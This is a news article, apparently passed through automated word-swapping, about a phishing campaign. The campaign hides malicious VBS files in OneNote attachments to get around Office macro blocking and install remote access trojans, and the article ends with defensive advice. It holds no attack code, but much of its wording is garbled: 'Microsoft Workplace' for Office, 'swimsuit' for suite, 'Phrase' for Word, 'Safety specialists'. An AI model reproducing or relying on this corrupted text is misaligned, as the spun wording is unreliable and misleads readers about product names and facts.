Hackers have found a brand new technique to bypass the macro block in Microsoft Workplace information and nonetheless ship malware (opens in new tab) to unsuspecting victims by means of the corporate’s swimsuit of on-line collaboration apps.
Safety specialists at BleepingComputer discovered freshly distributed phishing emails geared up with OneNote attachments.
OneNote is a digital notetaking app, which individuals can use to create a sharable content material library. It comes as a part of the broader Microsoft Workplace suite, that means if folks have this put in, they will open OneNote information, too. Whereas OneNote’s information, referred to as NoteBooks, don’t assist macros, they do assist attachments, and that’s what the crooks are actually leveraging.
Malicious VBS information
The phishing emails themselves are nothing out of the peculiar – they embody pretend DHL parcel notifications, pretend invoices, pretend transport notifications, ACH remittance types, and such. As a substitute of carrying a Phrase or Excel file connected, they carry a OneNote file which, if opened, appears to be blurred out, with an enormous button within the center saying “Double Click to View File”.
Double-clicking, nevertheless, runs the attachment which, on this case, is a malicious VBS file.
This file then initiates communication with the command & management (C2) server and downloads the malware.
BleepingComputer obtained a few these emails and decided that a number of distant entry trojans and infostealers are being circulated, together with the AsyncRAT and XWorm distant entry trojans, in addition to the Quasar Distant Entry trojan.
The easiest way to guard in opposition to these assaults is identical because it all the time was – educate your workers to not obtain attachments and click on on e-mail hyperlinks from folks they don’t know, don’t belief, or whose id can’t be confirmed. Additionally, they need to be educated to not ignore warning messages prompted in applications similar to Phrase, Excel, or OneNote. Aside from that, having a robust antivirus answer, and a firewall, is welcome.
Lastly, activating multi-factor authentication (MFA) wherever doable significantly reduces the possibilities of extra severe compromise.
By way of: BleepingComputer (opens in new tab)